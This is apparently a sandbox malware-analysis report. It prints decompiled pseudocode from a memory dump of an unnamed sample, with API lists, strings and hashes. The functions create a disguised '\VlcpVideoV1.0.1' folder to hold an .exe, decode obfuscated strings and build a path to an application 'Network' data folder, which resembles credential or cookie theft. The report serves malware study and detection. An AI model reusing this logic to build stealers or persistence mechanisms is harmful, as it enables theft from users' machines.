0x00d0d1e3
0x00d0d1e6
0x00d0d1e8
0x00d0d1eb
0x00d0d1eb
0x00d0d1ee
0x00d0d1f2
0x00d0d1f6
0x00d0d1f9
0x00d0d1fc
0x00d0d20a
0x00000000
0x00000000
0x00000000
0x00d0d132

APIs

RtlEnterCriticalSection.NTDLL(00F0B384), ref: 00D0D11B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00F0B368,?,00D0D328,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D173
GlobalHandle.KERNEL32(009CFD30), ref: 00D0D17E
GlobalUnWire.KERNEL32(00000000), ref: 00D0D187
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00D0D1A0
GlobalFix.KERNEL32(00000000), ref: 00D0D1B5
_memset.LIBCMT ref: 00D0D1CF
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D1FC
GlobalHandle.KERNEL32(009CFD30), ref: 00D0D20E
GlobalFix.KERNEL32(00000000), ref: 00D0D215
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D21C
RtlEnterCriticalSection.NTDLL(?), ref: 00D0D234
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D27C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Global$CriticalSection$Leave$AllocEnterHandle$Wire_memset
String ID:
API String ID: 4149757546-0
Opcode ID: c185c7cdb8383c7c4db7a8e20dc5d40c73a8e2c15c1e1d768df80a9995bde612
Instruction ID: 682f1c29163382e26d151c354b45a8029607185cddfbf62dc3fb11abea6c07e0
Opcode Fuzzy Hash: c185c7cdb8383c7c4db7a8e20dc5d40c73a8e2c15c1e1d768df80a9995bde612
Instruction Fuzzy Hash: 1551BF71200705AFDB14CFA4D885B6AB7B9FF05311B04426AE91DE76A1CB30F955CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE2BF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00CAE2BF(intOrPtr* __ecx, void* __eflags, signed int _a4, signed int* _a8) {
				intOrPtr _v0;
				signed int _v12;
				short _v16;
				void* _v24;
				char _v28;
				signed int _v40;
				short _v548;
				intOrPtr _v552;
				char _v570;
				char _v572;
				char _v576;
				intOrPtr _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t52;
				signed int _t54;
				void _t62;
				WCHAR* _t64;
				struct _SECURITY_ATTRIBUTES* _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				void _t68;
				void _t69;
				intOrPtr _t72;
				int _t77;
				signed int _t87;
				void* _t88;
				signed int* _t91;
				void* _t92;
				signed int _t93;
				signed int _t98;
				signed int _t101;
				intOrPtr _t113;
				signed int* _t123;
				void* _t126;
				void* _t128;
				intOrPtr* _t132;
				void* _t134;
				void* _t140;
				intOrPtr* _t142;
				intOrPtr _t143;
				void* _t149;
				signed int _t154;
				signed int _t158;
				void* _t160;
				void* _t161;

				E00CA5A73(__ecx, 0x8007000e);
				asm("int3");
				_t154 = _t158;
				_push(__ecx);
				_push(__ecx);
				_t91 = _a8;
				_t146 = __ecx;
				_push(_t126);
				_t52 =  *_t91;
				_v16 = 0;
				if(_t52 < 0) {
					E00CA5A73(0, 0x80070057);
					asm("int3");
					_t54 =  *0xf02790; // 0x8cab593a
					_v40 = _t54 ^ _t158;
					_t92 = _v24;
					_v576 = _v28;
					_v580 = 0;
					_v572 = 0;
					0xe23f30( &_v570, 0, 0x206, _t126, __ecx, _t91, _t154);
					_t160 = _t158 - 0x220 + 0xc;
					 *0xe8e540(GetDesktopWindow(),  &_v572, 5, 0); // executed
					_t128 =  &_v572 - 2;
					do {
						_t62 =  *(_t128 + 2);
						_t128 = _t128 + 2;
					} while (_t62 != 0);
					_t98 = 8;
					_t64 = memcpy(_t128, L"\\VlcpVideoV1.0.1", _t98 << 2);
					_t161 = _t160 + 0xc;
					asm("movsw"); // executed
					_t65 = PathFileExistsW(_t64); // executed
					if(_t65 == 0) {
						_t77 = CreateDirectoryW( &_v548, _t65); // executed
						if(_t77 == 0) {
							0xe25ec7( &_v28, 0xe93e38, 3);
							_t161 = _t161 + 0xc;
						}
					}
					_t132 =  &_v548 - 2;
					do {
						_t66 =  *((intOrPtr*)(_t132 + 2));
						_t132 = _t132 + 2;
					} while (_t66 != 0);
					_t67 = "\\"; // 0x5c
					_t149 = _t92;
					 *_t132 = _t67;
					do {
						_t68 =  *_t92;
						_t92 = _t92 + 2;
					} while (_t68 != 0);
					_t93 = _t92 - _t149;
					_t134 =  &_v548 - 2;
					do {
						_t69 =  *(_t134 + 2);
						_t134 = _t134 + 2;
					} while (_t69 != 0);
					_t101 = _t93 >> 2;
					memcpy(_t134, _t149, _t101 << 2);
					memcpy(_t149 + _t101 + _t101, _t149, _t93 & 0x00000003);
					_t140 =  &_v548 - 2;
					do {
						_t72 =  *((intOrPtr*)(_t140 + 2));
						_t140 = _t140 + 2;
					} while (_t72 != 0);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					E00CA3D46(_v552,  &_v548);
					0xe2142c();
					return _v552;
				} else {
					_t142 = _a4;
					if(_t142 == 0 ||  *_t142 == 0) {
						_t143 =  *_t146;
						if(_t52 >=  *((intOrPtr*)(_t143 - 0xc))) {
							goto L8;
						} else {
							_push(E00CAD6BA(_t146));
							_push(_t143 +  *_t91 * 2);
							E00CAC0E0(_t91, _v0, _t143);
						}
					} else {
						_t113 =  *__ecx;
						_t123 = _t113 + _t52 * 2;
						_a8 = _t123;
						_t87 = _t113 +  *(_t113 - 0xc) * 2;
						_a4 = _t87;
						if(_t123 >= _t87) {
							L8:
							 *_t91 =  *_t91 | 0xffffffff;
							E00CA36A6(_v0, _t146, E00CAD6BA(_t146));
						} else {
							0xe26c61(_t123, _t142);
							_v12 = _t87;
							_t88 = _a8 + _t87 * 2;
							if(_t88 >= _a4) {
								goto L8;
							} else {
								0xe26bf7(_t88, _t142);
								_t17 =  *_t91 + _v12 + 1; // 0x1
								 *_t91 = _t17 + _t88;
								E00CADA67(__ecx, _v0,  *_t91 + _v12, _t88);
							}
						}
					}
					return _v0;
				}
			}

0x00cae2c4
0x00cae2c9
0x00cae2cb
0x00cae2cd
0x00cae2ce
0x00cae2d0
0x00cae2d4
0x00cae2d8
0x00cae2d9
0x00cae2db
0x00cae2e0
0x00cae384
0x00cae389
0x00cae393
0x00cae39a
0x00cae3a1
0x00cae3a6
0x00cae3b0
0x00cae3bb
0x00cae3ca
0x00cae3cf
0x00cae3e3
0x00cae3ef
0x00cae3f2
0x00cae3f2
0x00cae3f6
0x00cae3f9
0x00cae400
0x00cae40c
0x00cae40c
0x00cae40f
0x00cae411
0x00cae419
0x00cae423
0x00cae42b
0x00cae438
0x00cae43d
0x00cae43d
0x00cae42b
0x00cae446
0x00cae44b
0x00cae44b
0x00cae44f
0x00cae452
0x00cae457
0x00cae45c
0x00cae45e
0x00cae460
0x00cae460
0x00cae463
0x00cae466
0x00cae471
0x00cae473
0x00cae476
0x00cae476
0x00cae47a
0x00cae47d
0x00cae484
0x00cae487
0x00cae48e
0x00cae496
0x00cae499
0x00cae499
0x00cae49d
0x00cae4a0
0x00cae4b7
0x00cae4b8
0x00cae4b9
0x00cae4bb
0x00cae4ce
0x00cae4d6
0x00cae2e6
0x00cae2e6
0x00cae2eb
0x00cae341
0x00cae346
0x00000000
0x00cae348
0x00cae352
0x00cae358
0x00cae359
0x00cae359
0x00cae2f2
0x00cae2f2
0x00cae2f4
0x00cae2fa
0x00cae2fd
0x00cae300
0x00cae305
0x00cae360
0x00cae360
0x00cae36e
0x00cae307
0x00cae309
0x00cae313
0x00cae316
0x00cae31c
0x00000000
0x00cae31e
0x00cae320
0x00cae32d
0x00cae336
0x00cae33a
0x00cae33a
0x00cae31c
0x00cae305
0x00cae37c
0x00cae37c

APIs

_wcsspn.LIBCMT ref: 00CAE309
_wcscspn.LIBCMT ref: 00CAE320
_memset.LIBCMT ref: 00CAE3CA
GetDesktopWindow.USER32 ref: 00CAE3DC
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00CAE3E3
PathFileExistsW.SHLWAPI(?,?,?,00000000), ref: 00CAE411
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00CAE423
_sprintf.LIBCMT ref: 00CAE438

Strings

.exe, xrefs: 00CAE4B1
\VlcpVideoV1.0.1, xrefs: 00CAE401

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Path$CreateDesktopDirectoryExistsFileFolderSpecialWindow_memset_sprintf_wcscspn_wcsspn
String ID: .exe$\VlcpVideoV1.0.1
API String ID: 935740167-4252105261
Opcode ID: b84100a1bcd48fb75bcc30c5b287b6da4c391233a633b9d3d7abab1a77f9c13f
Instruction ID: 7f208f09aa2a00950dcdd4ca2465fc19d45ebfde49a26704878db238a8ad6c2f
Opcode Fuzzy Hash: b84100a1bcd48fb75bcc30c5b287b6da4c391233a633b9d3d7abab1a77f9c13f
Instruction Fuzzy Hash: 5C51E475A0021EABCF24DF69DC85ADEB7B9FF55304F008559F809A7210EB30AA41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00CADCF2 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00CADCF2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v24;
				char _v280;
				char _v284;
				signed int _v288;
				char _v292;
				char _v296;
				signed int _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				void* _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr* _v348;
				intOrPtr _v352;
				char _v356;
				char* _t122;
				char* _t128;
				signed int* _t129;
				signed int* _t130;
				intOrPtr* _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr* _t138;
				char* _t140;
				intOrPtr* _t151;
				void* _t153;
				void* _t157;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t165;
				void* _t173;
				intOrPtr _t174;
				void* _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr* _t197;
				intOrPtr _t209;
				intOrPtr* _t214;
				char _t217;
				void* _t218;
				intOrPtr _t219;
				signed int _t222;
				signed int _t223;
				intOrPtr* _t225;
				void* _t230;
				void* _t231;

				_t175 = __ebx;
				_push(__esi);
				_t222 = _a4;
				_push(__edi);
				_t214 =  *__ecx - 0x10;
				_t179 =  *_t214;
				if( *((intOrPtr*)(_t214 + 8)) >= _t222 || _t222 <= 0) {
					L4:
					E00CAE2BF(_t179, __eflags);
					asm("int3");
					0xe21503();
					_v308 = _a12;
					_v8 = 1;
					E00D09480(_t175,  &_v304,  &_a4);
					_t181 = 0x154;
					_t217 = 0;
					_v8 = 2;
					_t223 = _t222 | 0xffffffff;
					0xe6457a( &_v296, _t223, 0x40, 0x8000, 0);
					_t122 =  &_v296;
					0xe6455a(_t122, "d"); // executed
					_t176 = _t122;
					__eflags = _t176;
					if(_t176 == 0) {
						0xe6457a( &_v296, _t223, 0x22, 0, "j`a");
						_t128 =  &_v296;
						0xe6454a(_t128); // executed
						_t176 = _t128;
						__eflags = _t176;
						if(_t176 == 0) {
							_t129 =  &_v288;
							_v288 = _t223;
							0xe6458a(_v296, _t129, 0, 0);
							_t176 = _t129;
							__eflags = _t176;
							if(_t176 == 0) {
								0xe645aa(_v288, _v304, 1); // executed
								_t176 = _t129;
								__eflags = _t176;
								if(_t176 == 0) {
									_t130 =  &_v300;
									_v300 = _t223;
									0xe645da(_v288, _v304, 0, _t130, 1);
									_t176 = _t130;
									__eflags = _t176;
									if(_t176 == 0) {
										_t131 = E00D09547(_t181, "Fihc`oNby|vUi");
										_t224 = _t131;
										_v312 = 0;
										_v348 = _t131;
										_t132 = E00D09547(_t181, "kgjm");
										_v352 = _t132;
										_t133 = E00D09547(_t181, "sgk}l");
										_v336 = _t133;
										_t134 = E00D09547(_t181, "wbhehce");
										_v344 = _t134;
										_v284 = 0;
										0xe23f30( &_v280, 0, 0x104, 0, 0, 0, 0);
										_t138 = E00CACD24(_t176, _t181, 0, _t131, _v300, _v288, _t224,  &_v284,  &_v312);
										_t231 = _t230 + 0x40;
										while(1) {
											__eflags = _t138;
											if(_t138 == 0) {
												break;
											}
											_t140 =  &_v280;
											0xe645fa(_v288, _v300, _t140, _t217, _t217, 4,  &_v292);
											_t176 = _t140;
											_v340 = _t176;
											0xe6462a(_v288, _v292, 0x80000000, _t217);
											__eflags = _t140;
											if(_t140 == 0) {
												do {
													E00CA36A6( &_v320, _t224, E00D0CAD0());
													_v8 = 3;
													E00CA36A6( &_v324, _t224, E00D0CAD0());
													_v8 = 4;
													E00CA36A6( &_v316, _t224, E00D0CAD0());
													_v8 = 5;
													_t151 = _v24 + 0x108;
													while(1) {
														__eflags =  *_t151 - _t217;
														if( *_t151 == _t217) {
															break;
														}
														_t225 =  *_t151;
														_t49 = _t225 + 8; // 0x8
														_t218 = _t49;
														0xe2695e(_t218, _v352);
														__eflags = _t151;
														if(_t151 != 0) {
															0xe2695e(_t218, _v336);
															__eflags = _t151;
															if(_t151 != 0) {
																0xe2695e(_t218, _v344);
																__eflags = _t151;
																if(_t151 == 0) {
																	_t153 = E00CADB7A(_t214,  &_v332, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
																	_t231 = _t231 + 0x14;
																	_v8 = 8;
																	E00CAC13D( &_v316, _t225, _t153);
																	_t209 = _v332;
																	goto L19;
																}
															} else {
																_t157 = E00CADB7A(_t214,  &_v328, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
																_t231 = _t231 + 0x14;
																_v8 = 7;
																E00CAC13D( &_v324, _t225, _t157);
																_t209 = _v328;
																goto L19;
															}
														} else {
															_t160 = E00CADB7A(_t214,  &_v356, _v288, _v292,  *((intOrPtr*)(_t225 + 4)),  *_t225);
															_t231 = _t231 + 0x14;
															_v8 = 6;
															E00CAC13D( &_v320, _t225, _t160);
															_t209 = _v356;
															L19:
															_v8 = 5;
															E00CA656C(_t209 - 0x10, _t214);
														}
														_t75 = _t225 + 0x108; // 0x108
														_t151 = _t75;
														_t217 = 0;
														__eflags = 0;
													}
													_t224 = _v316;
													_t197 = _t224;
													_t214 = _t197 + 2;
													do {
														_t162 =  *_t197;
														_t197 = _t197 + 2;
														__eflags = _t162 - _t217;
													} while (_t162 != _t217);
													0xe26e13(_a8, _t224, _t197 - _t214 >> 1);
													_t219 = _v320;
													_t231 = _t231 + 0xc;
													_t177 = _v324;
													__eflags = _t162;
													if(_t162 == 0) {
														_push( *((intOrPtr*)(_t219 - 0xc)));
														E00CAC201(_v308, _t219);
														_push(E00CA67CE("="));
														E00CAC201(_v308, "=");
														_push( *((intOrPtr*)(_t177 - 0xc)));
														E00CAC201(_v308, _t177);
														_push(E00CA67CE(0xe93e34));
														E00CAC201(_v308, 0xe93e34);
													}
													E00CA656C(_t224 - 0x10, _t214);
													E00CA656C(_t177 - 0x10, _t214);
													_t181 = _t219 - 0x10;
													_v8 = 2;
													_t165 = E00CA656C(_t219 - 0x10, _t214);
													_t217 = 0;
													0xe6462a(_v288, _v292, 1, 0);
													__eflags = _t165;
												} while (_t165 == 0);
												_t176 = _v340;
												_t224 = _v348;
											}
											0xe6460a(_v288, _v292);
											_v284 = _t217;
											0xe23f30( &_v280, _t217, 0x104);
											_t138 = E00CACD24(_t176, _t181, _t217, _t224, _v300, _v288, _t224,  &_v284,  &_v312);
											_t231 = _t231 + 0x20;
										}
										0xe645ea(_v288, _v300, 1);
										0xe645ba(_v288, _v304);
									}
								}
								0xe6459a(_v288, _t217);
								_push(_v296);
							} else {
								_push(0);
							}
							0xe6456a(); // executed
						}
					}
					E00CA656C(_v304 - 0x10, _t214);
					E00CA656C(_a4 - 0x10, _t214);
					E00CA656C(_a8 - 0x10, _t214);
					0xe214b2();
					return _t176;
				} else {
					_t173 =  *((intOrPtr*)( *_t179 + 8))(_t214, _t222, 1);
					if(_t173 == 0) {
						goto L4;
					} else {
						_t174 = _t173 + 0x10;
						 *__ecx = _t174;
						return _t174;
					}
				}
			}

0x00cadcf2
0x00cadcf5
0x00cadcf6
0x00cadcf9
0x00cadcfe
0x00cadd01
0x00cadd06
0x00cadd24
0x00cadd24
0x00cadd29
0x00cadd34
0x00cadd3c
0x00cadd45
0x00cadd54
0x00cadd5a
0x00cadd5b
0x00cadd5d
0x00cadd69
0x00cadd74
0x00cadd7e
0x00cadd85
0x00cadd8a
0x00cadd8c
0x00cadd8e
0x00cadda4
0x00cadda9
0x00caddb0
0x00caddb5
0x00caddb7
0x00caddb9
0x00caddc1
0x00caddc7
0x00caddd4
0x00caddd9
0x00cadddb
0x00cadddd
0x00caddf3
0x00caddf8
0x00caddfa
0x00caddfc
0x00cade04
0x00cade0a
0x00cade1e
0x00cade23
0x00cade25
0x00cade27
0x00cade33
0x00cade38
0x00cade3a
0x00cade46
0x00cade4c
0x00cade57
0x00cade5d
0x00cade68
0x00cade6e
0x00cade78
0x00cade86
0x00cade8c
0x00cadeac
0x00cadeb1
0x00cae16e
0x00cae16e
0x00cae170
0x00000000
0x00000000
0x00cadec4
0x00caded7
0x00cadee8
0x00cadef0
0x00cadef6
0x00cadefb
0x00cadefd
0x00cadf03
0x00cadf0f
0x00cadf14
0x00cadf24
0x00cadf29
0x00cadf39
0x00cadf41
0x00cadf45
0x00cae047
0x00cae047
0x00cae049
0x00000000
0x00000000
0x00cadf4f
0x00cadf57
0x00cadf57
0x00cadf5b
0x00cadf62
0x00cadf64
0x00cadfa8
0x00cadfaf
0x00cadfb1
0x00cadff2
0x00cadff9
0x00cadffb
0x00cae015
0x00cae01a
0x00cae024
0x00cae028
0x00cae02d
0x00000000
0x00cae02d
0x00cadfb3
0x00cadfcb
0x00cadfd0
0x00cadfda
0x00cadfde
0x00cadfe3
0x00000000
0x00cadfe3
0x00cadf66
0x00cadf7e
0x00cadf83
0x00cadf8d
0x00cadf91
0x00cadf96
0x00cae033
0x00cae036
0x00cae03a
0x00cae03a
0x00cae03f
0x00cae03f
0x00cae045
0x00cae045
0x00cae045
0x00cae04f
0x00cae055
0x00cae057
0x00cae05a
0x00cae05a
0x00cae05d
0x00cae060
0x00cae060
0x00cae06e
0x00cae073
0x00cae079
0x00cae07c
0x00cae082
0x00cae084
0x00cae086
0x00cae090
0x00cae0a6
0x00cae0ac
0x00cae0b1
0x00cae0bb
0x00cae0d1
0x00cae0d7
0x00cae0d7
0x00cae0df
0x00cae0e7
0x00cae0ec
0x00cae0ef
0x00cae0f3
0x00cae0f8
0x00cae109
0x00cae10e
0x00cae10e
0x00cae116
0x00cae11c
0x00cae11c
0x00cae12e
0x00cae13e
0x00cae146
0x00cae166
0x00cae16b
0x00cae16b
0x00cae184
0x00cae195
0x00cae195
0x00cade27
0x00cae1a1
0x00cae1a6
0x00cadddf
0x00cadddf
0x00cadddf
0x00cae1ac
0x00cae1ac
0x00caddb9
0x00cae1ba
0x00cae1c5
0x00cae1d0
0x00cae1d7
0x00cae1dc
0x00cadd0c
0x00cadd12
0x00cadd17
0x00000000
0x00cadd19
0x00cadd19
0x00cadd1c
0x00cadd21
0x00cadd21
0x00cadd17

APIs

__EH_prolog3_GS.LIBCMT ref: 00CADD34
_memset.LIBCMT ref: 00CADE8C
__wcsnicmp.LIBCMT ref: 00CAE06E

Strings

j`a, xrefs: 00CADD94
wbhehce, xrefs: 00CADE63
Fihc`oNby|vUi, xrefs: 00CADE2E
sgk}l, xrefs: 00CADE52
kgjm, xrefs: 00CADE41

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3___wcsnicmp_memset
String ID: Fihc`oNby|vUi$j`a$kgjm$sgk}l$wbhehce
API String ID: 3863332369-1906186485
Opcode ID: 58c985a1331037e515ed62294d7c50e5a322effcf3b29032560347510a45f5ae
Instruction ID: d883b73c4e6ab4d3124158ac8b225bbf0a9abc720bc099b46f850a9fc2ec4055
Opcode Fuzzy Hash: 58c985a1331037e515ed62294d7c50e5a322effcf3b29032560347510a45f5ae
Instruction Fuzzy Hash: 92D1607190021AABCF25AB60CC85FDEBBB9EF5A704F0040D9F60A76191DA719F94DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7A14 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00CA7A14(void* __ecx, void* __eflags) {
				void* _t28;
				intOrPtr _t40;
				signed int _t49;
				intOrPtr _t50;
				signed int _t51;
				intOrPtr _t67;
				void* _t70;
				void* _t71;
				void* _t72;

				0xe21503(0x17c);
				_t50 =  *((intOrPtr*)(_t70 + 8));
				_t67 =  *((intOrPtr*)(_t70 + 0xc));
				_t28 = E00D095A9(__ecx, L"IIDIEK[\\IO[Q");
				0xe24b10(_t28, 0);
				_t72 = _t71 + 0xc;
				if(_t28 != 0) {
					L3:
					E00CA3D46(_t70 - 0x28, _t28);
					 *(_t70 - 4) =  *(_t70 - 4) & 0x00000000;
					_push(0);
					E00CA7590(_t70 - 0x28, __eflags, _t30, E00CA9A45(E00D095A9(_t70 - 0x28, 0xe93b40)));
					E00CA7590(_t70 - 0x28, __eflags, L"Network\\", E00CA9A45(L"Network\\"));
					E00CA7590(_t70 - 0x28, __eflags, _t50, E00CA9A45(_t50));
					_push(1);
					_push(0x40);
					_push(0x21);
					_push(_t70 - 0x28);
					E00CA3949(_t70 - 0xe0); // executed
					 *(_t70 - 4) = 1;
					_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t70 - 0xe0)) + 4));
					__eflags =  *(_t70 + _t40 - 0xd4) & 0x00000006;
					if(( *(_t70 + _t40 - 0xd4) & 0x00000006) == 0) {
						_push(1);
						_push(0x40);
						_push(0x22);
						_push(_t67);
						E00CA3B57(_t70 - 0x188); // executed
						 *(_t70 - 4) = 2;
						_push(_t70 - 0xd0);
						E00CA5071(_t70 - 0x188, __eflags); // executed
						E00CA789A(_t70 - 0x188, __eflags);
						E00CA7868(_t70 - 0xe0, __eflags);
						_t51 = 1;
						E00CA52B1(_t70 - 0x188);
					} else {
						_t51 = 0;
					}
					E00CA5225(_t70 - 0xe0);
					E00CA71CD(_t70 - 0x28, 1, 0);
					_t49 = _t51;
				} else {
					_t28 = E00D095A9(__ecx, L"DVWLH^J");
					0xe24b10(_t28, _t28);
					_t72 = _t72 + 0xc;
					if(_t28 != 0) {
						goto L3;
					} else {
						_t49 = 0;
					}
				}
				0xe214b2();
				return _t49;
			}

0x00ca7a1e
0x00ca7a23
0x00ca7a26
0x00ca7a30
0x00ca7a36
0x00ca7a3b
0x00ca7a40
0x00ca7a61
0x00ca7a65
0x00ca7a6a
0x00ca7a6e
0x00ca7a8a
0x00ca7aa0
0x00ca7ab1
0x00ca7ab6
0x00ca7ab8
0x00ca7aba
0x00ca7abf
0x00ca7ac6
0x00ca7ad1
0x00ca7ad5
0x00ca7ad8
0x00ca7ae0
0x00ca7ae6
0x00ca7ae8
0x00ca7aea
0x00ca7aec
0x00ca7af3
0x00ca7afe
0x00ca7b02
0x00ca7b09
0x00ca7b14
0x00ca7b1f
0x00ca7b2a
0x00ca7b2c
0x00ca7ae2
0x00ca7ae2
0x00ca7ae2
0x00ca7b37
0x00ca7b43
0x00ca7b48
0x00ca7a42
0x00ca7a48
0x00ca7a4e
0x00ca7a53
0x00ca7a58
0x00000000
0x00ca7a5a
0x00ca7a5a
0x00ca7a5a
0x00ca7a58
0x00ca7b4a
0x00ca7b4f

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA7A1E
__wgetenv.LIBCMT ref: 00CA7A36
__wgetenv.LIBCMT ref: 00CA7A4E

Part of subcall function 00E24B10: _wcsnlen.LIBCMT ref: 00E24B49
Part of subcall function 00E24B10: __lock.LIBCMT ref: 00E24B5A
Part of subcall function 00E24B10: __wgetenv_helper_nolock.LIBCMT ref: 00E24B65

char_traits.LIBCPMT ref: 00CA7A7D
char_traits.LIBCPMT ref: 00CA7A95
char_traits.LIBCPMT ref: 00CA7AA6

Strings

DVWLH^J, xrefs: 00CA7A43
IIDIEK[\IO[Q, xrefs: 00CA7A2B
Network\, xrefs: 00CA7A8F, 00CA7A94, 00CA7A9C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: char_traits$__wgetenv$H_prolog3___lock__wgetenv_helper_nolock_wcsnlen
String ID: DVWLH^J$IIDIEK[\IO[Q$Network\
API String ID: 3563457284-4247936164
Opcode ID: 5bf2fb0e011cf9e4b95320dd72e01b589a615390b602ff036f8efb1bc3cac57b
Instruction ID: 9ea352c8383786c2a97ea1052b19813181ae7e2188eba89c92adc550e86ff529
Opcode Fuzzy Hash: 5bf2fb0e011cf9e4b95320dd72e01b589a615390b602ff036f8efb1bc3cac57b
Instruction Fuzzy Hash: 7A31C2719442157ADB10F7A0DC67FEE7378AF16708F045594F90A761C2EEB06F84EA60

Uniqueness

Uniqueness Score: -1.00%

Function 00DC19EB Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00DC19F2

Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
Part of subcall function 00D0F0EC: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
Part of subcall function 00D0F0EC: RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 00DC1A45
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 00DC1A5B

Strings

DragDelay, xrefs: 00DC1A50
windows, xrefs: 00DC1A3F, 00DC1A44, 00DC1A55
dk, xrefs: 00DC1A09
DragMinDist, xrefs: 00DC1A3A

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

